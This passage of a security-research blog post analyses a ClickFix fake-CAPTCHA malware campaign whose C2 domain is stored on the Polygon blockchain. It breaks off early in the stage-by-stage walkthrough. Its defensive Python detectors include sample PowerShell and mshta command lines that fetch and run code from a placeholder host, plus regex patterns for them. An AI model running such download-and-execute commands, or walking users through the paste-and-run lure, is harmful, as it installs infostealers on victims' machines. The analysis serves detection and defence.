ClickFix 2026: Fake Captcha Hides C2 On-Chain



PhishEye Research · June 24, 2026 · 15 min read


A fake "verify you're human" CAPTCHA is now one of the most common ways malware reaches a desktop in 2026. The trick, known as ClickFix, never exploits a browser bug. It convinces the visitor to copy a hidden command and run it themselves, so the operating system only ever sees a person typing into their own shell. This investigation dissects a live ClickFix campaign that adds a distinctly 2026 twist: its command-and-control (C2) address is stored on the Polygon blockchain, a technique called EtherHiding, which makes the infrastructure almost impossible to take down.

The entry point was an ordinary hacked WooCommerce store. Loaded in a normal browser the site looked clean, because the malicious loader is cloaked and only fires for the right visitor. Behind it sits a professional ClickFix-as-a-service kit with swappable lure templates (fake reCAPTCHA, fake Cloudflare check, fake Blue Screen) and a Polygon smart contract that hands out the current attack domain on demand. Here is the full chain, the decoded payload, the indicators to block, and how to respond if a command has already been pasted.

Editor's note. The compromised site is anonymized as "the victim store": it is a real, legitimate business whose WordPress site was hacked, and naming it before remediation would expose its customers to further harm. All attacker infrastructure is defanged (superboomer[.]world). Do not open the live URLs in a normal browser. The entire point of the attack is to get you to paste a command.

At a glance

Technique: ClickFix / fake CAPTCHA, clipboard hijack, infostealer loader
Entry point: Compromised WordPress + WooCommerce site (cloaked JS injection)
Targets: Windows and macOS desktop users only (Linux, Android, iOS skipped)
Lures: Fake reCAPTCHA, fake Cloudflare "verify you are human," fake BSOD, fake browser update
C2 technique: EtherHiding (the current C2 domain is stored in a Polygon smart contract)
Resilience: Domain rotation with one on-chain transaction; no re-infection needed
Status: Active in 2026; 97 unique C2 domains across 113 on-chain rotations (Mar–Jun 2026)

What is ClickFix, and why 2026 is its breakout year

ClickFix flips the malware-delivery model on its head. Instead of exploiting software, it exploits the user. A web page shows a familiar-looking obstacle (a CAPTCHA, a Cloudflare check, a "fix this error" prompt) and walks the visitor through three "human verification" steps:

1. Press Windows + R (or open Terminal on macOS).
2. Press Ctrl + V; the page has already copied a command to the clipboard.
3. Press Enter.

Those keystrokes run an attacker-supplied command, typically a hidden PowerShell or mshta one-liner that downloads and executes an infostealer (Lumma, StealC, or AMOS on macOS) or a loader. Because the victim runs the command, it sidesteps most browser and download protections: there is no malicious file to score and no signed bundle for Gatekeeper to quarantine. Through 2025 and into 2026, ClickFix became one of the most prevalent initial-access methods on the web, and the kits professionalized into ClickFix-as-a-service panels. The campaign below is one of them.
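The execution step above leaves a distinctive trace on Windows: the Run dialog hands the pasted line to explorer.exe, which then spawns a script interpreter with download-and-run cues. The following triage logic is an added example written for this article, not PhishEye's code; the Sysmon-style events and the `c2.example.invalid` domain are constructed.

```python
import re
from typing import Optional

# Win+R hands the pasted line to explorer.exe, so a ClickFix execution shows up as
# explorer.exe spawning a script interpreter with download-and-run cues.
RUN_DIALOG_PARENT = "explorer.exe"
PASTE_TARGETS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}
CUES = {
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "remote_fetch": re.compile(r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring)\b", re.I),
    "eval": re.compile(r"\biex\b|invoke-expression", re.I),
    "mshta_url": re.compile(r"mshta(\.exe)?\s+\S*https?://", re.I),
    "encoded": re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
}

def score_event(event: dict) -> Optional[dict]:
    """Return an alert for one process-creation event, or None if it looks benign."""
    image = event["image"].rsplit("\\", 1)[-1].lower()
    if image not in PASTE_TARGETS:
        return None
    hits = [name for name, rx in CUES.items() if rx.search(event["command_line"])]
    if not hits:
        return None
    parent = event["parent_image"].rsplit("\\", 1)[-1].lower()
    # explorer.exe as parent is the Run-dialog signature; other parents still get a look.
    severity = "high" if parent == RUN_DIALOG_PARENT else "medium"
    return {"severity": severity, "cues": hits, "command_line": event["command_line"]}

def triage(events: list) -> list:
    """Run every event through score_event and keep only the alerts."""
    return [a for a in (score_event(e) for e in events) if a]

# Constructed sample telemetry (Sysmon-style fields); the domain is a reserved placeholder.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"parent_image": r"C:\Windows\explorer.exe", "image": PS,
     "command_line": 'powershell -w hidden -c "iex (irm http://c2.example.invalid/v)"'},
    {"parent_image": r"C:\Windows\explorer.exe", "image": PS,
     "command_line": "powershell Get-Date"},
    {"parent_image": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\mshta.exe",
     "command_line": "mshta http://c2.example.invalid/v.hta"},
]

if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert["severity"], alert["cues"], alert["command_line"])
```

On macOS the equivalent signal is Terminal.app spawning curl or osascript, which the same cue table can be extended to cover.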

This is the same family as the macOS case we documented in ClickFix Drops Atomic Stealer via Fake DirBuster; what makes the 2026 variant different is everything behind the lure.

The case study: a hacked WooCommerce store

The victim store runs a standard stack: WordPress, WooCommerce, Astra/Elementor, on Hostinger/LiteSpeed. Loading the homepage as a normal desktop browser revealed nothing malicious. That is by design. The injected loader is cloaked: it builds its destination URL at runtime with String.fromCharCode() and injects a script element through document.createElement("script") only for targeted visitors, evading casual "view source" inspection and many automated scanners.

That selective behaviour is the hallmark of a Traffic Distribution System (TDS): server- and client-side logic that decides who sees the attack and who sees a clean page.

Anatomy of the attack chain

Compromised WordPress site
│ (cloaked JS loader, built via fromCharCode)
Reads C2 domain from Polygon smart contract ◄── EtherHiding (the twist)
superboomer[.]world (TDS — "Landing Analytics" panel)
│ • log.php → 1×1 tracking pixel (pageview telemetry, per victim site)
│ • /api/?a=tds_cfg → targeting config
OS check: Windows ✔ Mac ✔ Linux ✗ Android ✗ iOS ✗
Fake CAPTCHA landing page (titled "Terms of Service")
│ • Hijacks navigator.clipboard.writeText
│ • Decodes payload (base64 + XOR 0x83) → new Function()
Clipboard poisoned with malicious command
│ "Verify you're human: Win+R → Ctrl+V → Enter"
Victim runs PowerShell / Terminal command → infostealer / loader
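Two layers of the chain above can be unwrapped statically: the fromCharCode-built loader URL from the cloaked injection, and the landing page's base64 + XOR 0x83 payload that would otherwise reach new Function(). The helper below is an added analyst example, not PhishEye's tooling; the sample script and the `loader.example.invalid` URL are constructed, and the XOR key is the one the report names.

```python
import base64
import re

XOR_KEY = 0x83  # single-byte key the landing page XORs its base64 payload with

def decode_payload(b64_blob: str, key: int = XOR_KEY) -> str:
    """Reverse the base64 + XOR 0x83 layer and return the JavaScript as text,
    so the analyst reads what new Function() would have run instead of executing it."""
    raw = base64.b64decode(b64_blob)
    return bytes(b ^ key for b in raw).decode("utf-8", errors="replace")

def encode_sample(plaintext: str, key: int = XOR_KEY) -> str:
    """Apply the same two layers forward; only used to build constructed test input."""
    return base64.b64encode(bytes(b ^ key for b in plaintext.encode())).decode()

FROMCHARCODE = re.compile(r"String\.fromCharCode\(\s*([\d\s,]+?)\s*\)")
DYNAMIC_SCRIPT = re.compile(r"""createElement\(\s*["']script["']\s*\)""")

def recover_fromcharcode(js: str) -> list:
    """Rebuild every String.fromCharCode(...) literal statically, which exposes the
    loader's runtime-built URL without loading the page in a browser."""
    found = []
    for m in FROMCHARCODE.finditer(js):
        codes = [int(n) for n in m.group(1).replace(" ", "").split(",") if n]
        found.append("".join(chr(c) for c in codes))
    return found

def looks_like_cloaked_loader(js: str) -> bool:
    """Triage rule from the report's description: character-code-built strings
    combined with a dynamically injected script element."""
    return bool(FROMCHARCODE.search(js)) and bool(DYNAMIC_SCRIPT.search(js))

# Constructed sample, not the real loader; the URL uses a reserved placeholder TLD.
SAMPLE_URL = "https://loader.example.invalid/l.js"
SAMPLE_JS = (
    'var s=document.createElement("script");'
    "s.src=String.fromCharCode(" + ",".join(str(ord(c)) for c in SAMPLE_URL) + ");"
    "document.head.appendChild(s);"
)

if __name__ == "__main__":
    print(looks_like_cloaked_loader(SAMPLE_JS), recover_fromcharcode(SAMPLE_JS))
    print(decode_payload(encode_sample("navigator.clipboard.writeText = function(){}")))
```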

Stage 1: telemetry and targeting

The loader first beacons a tracking pixel and pulls a...

